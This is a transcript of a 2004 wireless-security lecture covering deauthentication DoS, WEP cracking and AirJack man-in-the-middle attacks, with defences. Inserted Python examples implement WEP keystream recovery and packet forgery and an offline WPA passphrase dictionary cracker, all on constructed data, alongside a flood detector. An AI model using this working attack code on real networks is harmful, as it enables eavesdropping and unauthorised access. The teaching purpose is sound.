Class 9 032904 - PowerPoint PPT Presentation

Title: Class 9 032904
Slides: 28
Provided by: UCS1

Transcript and Presenter's Notes

1
Class 9, 03-29-04
  • Wireless Security
  • Attack Technologies and How to Defend Against
    Them

2
Goals
  • Example of 3 attacks and tools used
  • How to protect against these attacks
  • Future Attack Trends
  • Future 802.11 security standards
  • Best Practices

3
Attack Scenario 1
  • Wireless classroom
  • Sudden disruption in connectivity
  • Then almost complete loss of wireless
    connectivity
  • What is going on here?

4
Attack Scenario 1
  • Look at sniffer logs
  • What kind of attack is occurring?
  • How is the attack being conducted?
  • How does the attacker get control?

5
Denial of Service Attacks
  • DoS attacks are the most prevalent wireless attacks
  • Range from short bursts to prolonged loss of service
  • DoS attack tools
  • Available for most Unix platforms
  • Very easy to run

6
DoS Attack Tool Void11
  • Trivial to spoof the MAC address of the AP
  • Void11 options
  • Target a single client or the entire network
  • Flood - disassociate or deauthenticate stations on
    the AP's behalf
  • Resource starvation - flood the AP with bogus
    authentication/association requests
  • Stations are kicked off and cannot reconnect while
    the flood lasts

7
DoS Damages
  • Growing trend to rely on wireless services
    without the ability to prevent these attacks
  • Wide area of coverage
  • High-gain antennas and RF amplifiers let the
    attacker work from well outside the premises
  • Equipment is easily concealed

8
Wireless DoS Mitigation
  • Channel switching
  • Not foolproof - the attacker can follow
  • Find the attacker (direction finding on the RF source)
  • Little else can be done to lessen the impact
    under the circumstances
  • Applications must be able to sustain downtime
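Scenario 1's questions (look at the sniffer logs; what kind of attack is it; how is it being conducted?) can be answered mechanically. What follows is an added example, not code from the slides or from Void11: a small Python analyzer over constructed sniffer log lines (my own simplified format: timestamp, management-frame subtype, source, destination, reason code) that flags the deauthentication/disassociation rate a Void11-style flood produces and reports whether the target was one client or the broadcast address, the tool's two options. The MAC addresses, timestamps and the five-frames-per-second threshold are assumptions.

```python
"""Rate-based detection of 802.11 deauthentication / disassociation floods.

Added example (not from the slides). The log format is a constructed
simplification of what a monitor-mode sniffer records per management frame:
timestamp, frame subtype, source address, destination address, reason code.
"""
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
KICK_SUBTYPES = ("deauth", "disassoc")

# Constructed sample capture: normal traffic, one ordinary deauth, then a
# flood of deauth frames whose source address claims to be the AP's BSSID
# (two of them to the broadcast address), followed by a burst of
# disassociation frames aimed at a single client.
SAMPLE_LOG = """\
1080580000.10 beacon 00:0b:86:aa:bb:cc ff:ff:ff:ff:ff:ff -
1080580000.35 assoc-resp 00:0b:86:aa:bb:cc 00:0c:41:11:22:33 -
1080580000.60 deauth 00:0b:86:aa:bb:cc 00:0c:41:44:55:66 3
1080580001.00 deauth 00:0b:86:aa:bb:cc ff:ff:ff:ff:ff:ff 7
1080580001.02 deauth 00:0b:86:aa:bb:cc ff:ff:ff:ff:ff:ff 7
1080580001.05 deauth 00:0b:86:aa:bb:cc 00:0c:41:11:22:33 7
1080580001.07 deauth 00:0b:86:aa:bb:cc 00:0c:41:11:22:33 7
1080580001.09 deauth 00:0b:86:aa:bb:cc 00:0c:41:44:55:66 7
1080580001.11 deauth 00:0b:86:aa:bb:cc 00:0c:41:44:55:66 7
1080580002.40 probe-req 00:0c:41:11:22:33 ff:ff:ff:ff:ff:ff -
1080580003.20 disassoc 00:0b:86:aa:bb:cc 00:0c:41:11:22:33 8
1080580003.25 disassoc 00:0b:86:aa:bb:cc 00:0c:41:11:22:33 8
1080580003.30 disassoc 00:0b:86:aa:bb:cc 00:0c:41:11:22:33 8
1080580003.35 disassoc 00:0b:86:aa:bb:cc 00:0c:41:11:22:33 8
1080580003.40 disassoc 00:0b:86:aa:bb:cc 00:0c:41:11:22:33 8
"""


def parse_log(text):
    """Parse 'ts subtype src dst reason' lines into dicts; '-' means no reason code."""
    frames = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, subtype, src, dst, reason = line.split()
        frames.append({
            "ts": float(ts),
            "subtype": subtype,
            "src": src.lower(),
            "dst": dst.lower(),
            "reason": None if reason == "-" else int(reason),
        })
    return frames


def detect_floods(frames, window=1.0, threshold=5):
    """Flag every (source, time window) holding >= threshold kick frames.

    One deauth per second is normal housekeeping; a Void11-style tool emits
    dozens per second, either to one station or to the broadcast address.
    """
    buckets = defaultdict(list)
    for f in frames:
        if f["subtype"] in KICK_SUBTYPES:
            buckets[(f["src"], int(f["ts"] // window))].append(f)

    alerts = []
    for (src, bucket), hits in sorted(buckets.items()):
        if len(hits) < threshold:
            continue
        targets = sorted({f["dst"] for f in hits})
        alerts.append({
            "source": src,
            "window_start": bucket * window,
            "count": len(hits),
            "subtypes": sorted({f["subtype"] for f in hits}),
            "scope": "entire network" if BROADCAST in targets else "single client(s)",
            "targets": targets,
        })
    return alerts


if __name__ == "__main__":
    for a in detect_floods(parse_log(SAMPLE_LOG)):
        print(f"{a['window_start']:.0f}: {a['count']} {'/'.join(a['subtypes'])} frames "
              f"from {a['source']} -> {a['scope']} {a['targets']}")
```

Because the source address is spoofed, the alert is attributed to the AP's own BSSID; to find the attacker (the mitigation step above) one still has to correlate with signal strength or with sequence-number gaps between the real AP's frames and the injected ones.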

9
Attack Scenario 2
  • Weak WEP keys (statistical key recovery from weak IVs)
  • AirJack, WEPCrack, BSD-Airtools, AirSnort
  • WEP reinjection attack tool reinj.c
  • Accelerates frame traffic (and therefore IV collection)
    by re-injecting captured TCP SYN or ARP frames, which
    provoke encrypted replies
  • WEP key recovery possible in less than 60 minutes

10
More about WEP
  • Only data frames are encrypted
  • Management and control frames (the link-layer
    signalling) are sent in the clear
  • WEP uses a single shared secret key for the whole
    network
  • Protection is transparent to upper-layer protocols
    and applications
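To make the WEP points above concrete, here is an added Python example, not code from the slides or from any of the tools listed. It implements WEP as the slides describe it (RC4 keyed with the 24-bit IV prepended to the shared key, a CRC-32 ICV, only the data payload encrypted) and shows two consequences of that design which the key-recovery tools build on: a frame with guessable plaintext (an ARP-shaped frame here) gives away the keystream for its IV, after which any frame sent under the same IV is readable without the key; and because the ICV is an unkeyed CRC, ciphertext can be altered so that it still passes the integrity check. The key, IV and payloads are constructed; the FMS weak-IV statistics themselves are not implemented.

```python
"""WEP in pure Python: RC4 keyed with IV || shared key, CRC-32 ICV.

Added example (not from the slides). The key, IV and frame contents are
constructed for the demonstration; no real traffic is involved.
"""
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Generate `length` bytes of RC4 keystream for `key` (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def crc32_le(data: bytes) -> bytes:
    """WEP's ICV: CRC-32 of the plaintext payload, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body: IV (3 bytes) || key-id byte || RC4(IV||key) XOR (payload||ICV)."""
    plaintext = payload + crc32_le(payload)
    return iv + b"\x00" + xor(plaintext, rc4(iv + key, len(plaintext)))


def wep_decrypt(key: bytes, frame_body: bytes):
    """Return (payload, icv_ok) for a frame body produced by wep_encrypt."""
    iv, body = frame_body[:3], frame_body[4:]
    plaintext = xor(body, rc4(iv + key, len(body)))
    payload, icv = plaintext[:-4], plaintext[-4:]
    return payload, icv == crc32_le(payload)


def recover_keystream(frame_body: bytes, known_payload: bytes) -> bytes:
    """Weakness 1: a predictable plaintext (ARP, DHCP) yields the keystream for
    that IV without the key, since the ICV is computable from the payload too."""
    return xor(frame_body[4:], known_payload + crc32_le(known_payload))


def decrypt_with_keystream(frame_body: bytes, keystream: bytes) -> bytes:
    """Any frame that reuses the IV (only 2^24 exist) decrypts with the
    recovered keystream, up to its length."""
    body = frame_body[4:]
    if len(body) > len(keystream):
        raise ValueError("recovered keystream is shorter than this frame")
    return xor(body, keystream)[:-4]


def flip_bits(frame_body: bytes, delta: bytes) -> bytes:
    """Weakness 2: no keyed integrity check. CRC-32 is affine over GF(2), so
    crc(P ^ D) == crc(P) ^ crc(D) ^ crc(0...0); XOR `delta` into the
    ciphertext and patch the encrypted ICV so it still verifies."""
    iv_hdr, body = frame_body[:4], frame_body[4:]
    payload_len = len(body) - 4
    delta = delta.ljust(payload_len, b"\x00")
    icv_patch = xor(crc32_le(delta), crc32_le(bytes(payload_len)))
    return iv_hdr + xor(body, delta + icv_patch)


KEY = bytes.fromhex("0102030405")     # constructed 40-bit shared WEP key
IV = bytes.fromhex("0a0b0c")          # constructed 24-bit IV
# Constructed frames: an ARP-shaped payload (LLC/SNAP + ARP header, fixed and
# guessable) and a secret payload that happens to be sent under the same IV.
ARP_LIKE = bytes.fromhex("aaaa030000000806" "0001080006040001") + bytes(20)
SECRET = b"user=alice&password=hunter2"


def demo():
    """Run both attacks; return what the attacker learns and what it forges."""
    arp_frame = wep_encrypt(KEY, IV, ARP_LIKE)
    secret_frame = wep_encrypt(KEY, IV, SECRET)
    keystream = recover_keystream(arp_frame, ARP_LIKE)
    leaked = decrypt_with_keystream(secret_frame, keystream)
    forged = flip_bits(secret_frame, bytes(5) + xor(b"alice", b"bobby"))
    forged_payload, icv_ok = wep_decrypt(KEY, forged)
    return leaked, forged_payload, icv_ok


if __name__ == "__main__":
    leaked, forged_payload, ok = demo()
    print("leaked :", leaked)
    print("forged :", forged_payload, "ICV valid:", ok)
```

This is also why reinj.c matters: every re-injected ARP or SYN provokes another encrypted reply, so the 2^24 IV space is consumed and the weak IVs that the key-recovery tools need arrive far faster than with passive capture alone.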

11
A Word about Wireless Detection
  • Detecting wireless networks
  • Active probes (send probe requests): NetStumbler,
    MiniStumbler
  • Example of war chalking
  • Passive probes (listen only, so they cannot be
    detected): Kismet, Wellenreiter, AirSnort

12
WEP Attack Mitigation
  • Use dynamic WEP keying (per-session keys distributed
    via 802.1X)
  • Asymmetric WEP keys
  • WEP with upgraded firmware that avoids weak IVs
  • Disable unnecessary traffic
  • Broadcast and multicast traffic forwarded from the
    wired network to the wireless network

13
Some Defensive Myths
  • SSID cloaking
  • Only see-through protection
  • Non-beaconing
  • SSID is still detectable (sent in probe responses
    and association requests)
  • Registering MAC addresses
  • Easy to spoof
  • Administrative burden

14
Attack Scenario 3
  • MITM attack
  • Insert the attack machine between victim and access
    point
  • Attacker needs proximity to the network
  • Two wireless cards: one to impersonate the AP toward
    the victim, one to associate with the real AP
  • AirJack by Abaddon
  • Monkey_Jack (inserts the attacker)
  • Kracker_Jack (attacks the session once inserted,
    e.g. VPNs)
  • Also includes DoS tools

15
Monkey-Jack
  • Attacker launches a DoS attack (deauthenticates the
    victim)
  • Victim's 802.11 card scans channels to search for
    a new AP
  • Victim's 802.11 card associates with the fake AP on
    the attack machine
  • Attack machine associates with the real AP
  • Attack machine is now inserted and can pass
    frames through in a manner that is transparent to
    the upper-level protocols

16
Before Monkey-Jack (diagram)
17
After Monkey-Jack (diagram)
18
Monkey_Jack (diagram)
19
How Monkey_Jack Works
  • No per-packet authentication of 802.11 management
    frames
  • Client or AP can easily be spoofed
  • Client station will actively scan for a new AP
    after being disassociated
  • Attacker impersonates the AP on another channel
  • Offers authentication and association
  • Legitimate AP is unaware anything happened

20
MITM Damages
  • VPN attacks (Kracker_Jack)
  • Wireless networks are more vulnerable to MITM
    attacks than wired networks: no physical access is
    needed
  • LEAP, EAP-MD5 (password-based challenge/response;
    a MITM can capture the exchange and run an offline
    dictionary attack)
  • Many VPN solutions are implemented with
    inadequate authentication for protection against
    wireless MITM attacks
  • DSniff attack suite by Dug Song
  • Compromise of SSL traffic (webmitm), DNS queries
    (dnsspoof), etc.

21
Defense Against MITM Attacks
  • Use EAP types that authenticate the server with TLS
  • PEAP, TTLS or EAP-TLS
  • Support WPA, 802.11i spec
  • When possible, configure clients to require the
    TLS tunnel and validate the server certificate
  • Send authentication credentials only inside the
    TLS tunnel, never outside it
  • Ask vendors to implement this feature

22
Future Attack Trends
  • More complex attack tools
  • More DoS attacks
  • Firmware flaws
  • Faster WEP cracking and more effective
    reinjection
  • Attacks against PEAP, TTLS, EAP/TLS, TKIP
  • Attacks we don't know about yet

23
Future Security Standards
  • WPA and 802.11i
  • Hot spots: effective key distribution
  • TKIP (Temporal Key Integrity Protocol) and 802.1X
    mechanisms
  • Dynamic encryption keys
  • Mutual authentication
  • Integration with an authentication server (e.g.,
    RADIUS) using 802.1X with EAP
  • Or pre-shared keys (i.e., passphrases) where no
    authentication server is available
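The last item, pre-shared keys, carries a caveat the slide does not state: in 802.11i PSK mode the passphrase is the only secret, and everything else that feeds the 4-way handshake MIC travels in the clear, so one captured handshake can be attacked offline with a wordlist. The following is an added Python example, not code from the slides. The PMK (PBKDF2-HMAC-SHA1, 4096 iterations), PTK (PRF-512) and HMAC-SHA1 MIC derivations follow IEEE 802.11i; the SSID, passphrase, MAC addresses, nonces, wordlist and the placeholder EAPOL-Key bytes are constructed for the demonstration.

```python
"""WPA/802.11i pre-shared-key mode: passphrase -> PMK -> PTK -> EAPOL MIC,
and the offline dictionary attack this enables once a 4-way handshake is
captured.

Added example (not from the slides). The derivations follow IEEE 802.11i;
SSID, passphrase, addresses, nonces, wordlist and EAPOL bytes are constructed.
"""
import hashlib
import hmac


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of addresses and
    nonces). The first 16 bytes are the KCK, which keys the handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_frame_zero_mic: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed (HMAC-SHA1,
    truncated to 16 bytes, as used with AES/CCMP)."""
    return hmac.new(kck, eapol_frame_zero_mic, hashlib.sha1).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_frame_zero_mic, observed_mic, wordlist):
    """Offline attack: every MIC input except the passphrase is in the captured
    handshake, so each candidate is checked without talking to the AP."""
    for candidate in wordlist:
        kck = wpa_ptk(wpa_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame_zero_mic), observed_mic):
            return candidate
    return None


# Constructed handshake (what a sniffer would see: SSID from the beacon, both
# MAC addresses, ANonce from message 1, SNonce and the MIC from message 2).
SSID = "corpnet"
AA = bytes.fromhex("000b86aabbcc")          # AP (authenticator) address
SPA = bytes.fromhex("000c41112233")         # client (supplicant) address
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Placeholder bytes standing in for EAPOL-Key message 2 with the MIC zeroed;
# not a faithfully laid out frame, just the data the MIC is computed over.
EAPOL_MSG2 = bytes.fromhex("0103007502010a00") + bytes(16) + SNONCE + bytes(32)
WORDLIST = ["password", "letmein", "wireless", "sunshine", "qwerty"]


def capture_from(passphrase: str) -> bytes:
    """Stand-in for sniffing message 2: the MIC a real client would send."""
    kck = wpa_ptk(wpa_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_MSG2)


if __name__ == "__main__":
    mic = capture_from("sunshine")
    print("recovered passphrase:",
          crack_psk(SSID, AA, SPA, ANONCE, SNONCE, EAPOL_MSG2, mic, WORDLIST))
```

wpa_pmk("password", "IEEE") reproduces the 802.11i Annex H test vector (f42c6fc5...). The 4096-iteration PMK cost slows guessing but does not stop it, which is why the enterprise path on the slide, 802.1X with EAP against a RADIUS server, is preferred over passphrases.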

24
802.11i
  • AES (stronger than RC4)
  • Will require replacement of equipment (AES is done
    in hardware)
  • AES supports 128-, 192- or 256-bit keys; 802.11i
    uses 128-bit keys
  • Two AES-based confidentiality and integrity protocols
  • WRAP (OCB mode)
  • CCMP (counter mode with CBC-MAC)
  • Ratification in 2004?

25
Best Practices
  • Enable all built-in security capabilities
  • Avoid signal leakage (antenna placement, power
    levels)
  • Use a VPN with strong mutual authentication
  • Wireless IDS and monitoring
  • Kismet: lots of features, free
  • AirDefense (commercial)
  • Buy equipment that can be upgraded to new
    security standards

26
Resources
  • Void11: wlsec.net/void11
  • AirJack: 802.11ninja.net
  • Kismet: www.kismetwireless.net
  • AirDefense: www.airdefense.net
  • AirSnort: airsnort.shmoo.com
  • Finland Nokia Group paper on tunneled
    authentication/MITM:
    www.saunalahti.fi/asokan/research/tunnel.pdf
  • WEPCrack: wepcrack.sourceforge.net
  • DSniff: naughty.monkey.org/~dugsong/dsniff/

27
Homework
  • Read over the EAP-TLS doc
  • One page of bullets